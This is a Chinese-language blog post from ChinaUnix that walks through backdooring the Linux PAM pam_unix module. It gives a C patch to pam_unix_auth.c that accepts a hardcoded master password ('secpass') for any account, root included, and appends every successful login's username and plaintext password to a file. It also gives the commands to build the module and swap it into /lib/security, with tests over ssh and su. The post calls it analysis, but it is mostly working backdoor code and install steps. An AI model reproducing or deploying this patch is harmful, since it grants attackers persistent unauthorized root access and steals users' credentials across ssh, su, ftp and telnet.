Chinaunix首页 | 论坛 | 博客

CyberSecurity

首页 |  博文目录 |  关于我

linuxnerd

  • 博客访问: 148934
  • 博文数量: 13
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 1192
  • 用 户 组: 普通用户
  • 注册时间: 2013-10-11 15:41
个人简介

Cyber Security

文章分类

全部博文(13)

文章存档

2015年(1)

2014年(6)

2013年(6)

我的朋友
最近访客
推荐博文
相关博文
PAM模块的backdoor实现与分析

分类: C/C++

2014-02-10 15:20:06

环境RHEL6.4

wget 

tar xzvf Linux-PAM-1.1.1.tar.gz

主要修改 Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c


点击(此处)折叠或打开

  1. /* verify the password of this user */
  2.         retval = _unix_verify_password(pamh, name, p, ctrl);

  4. if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}

  6. if(retval == PAM_SUCCESS)

  8. {
  9.                 FILE *fd;
  10.                 fd = fopen(PASSWD_FILE, "a");
  11.                 fprintf(fd, "%s:%s\n", name, p);
  12.                         fclose(fd);
  13. }
  14.         name = p = NULL;
  15.         AUTH_RETURN;
  16. }
./configure && make

cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so  前提对系统现有pam_unix.so文件备份

测试ssh

以上是使用了万能密码登录功能,以不同的root密码登录,获得同样的root权限,另一个是记录登录密码到指定文件。

在被攻击端查看密码文件,第一次管理员正常以root身份登录,第二次攻击者以root身份使用后门密码登录。

测试su
普通用户sysuser登录系统后,分别使用万能密码和正常密码切换为root


总结:PAM模块的backdoor程序实现很简单,主要为万能密码和键盘记录功能,还可以提供远程发送密码功能,主要影响了所有在/etc/pam.d/下利用到PAM模块认证的方式(ssh、su、ftp、telnet等。)

Have a nice day.
阅读(5945) | 评论(0) | 转发(1) |
0

上一篇:Linux下分析SYN flood攻击案例

下一篇:Linux C实现cgi shell

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6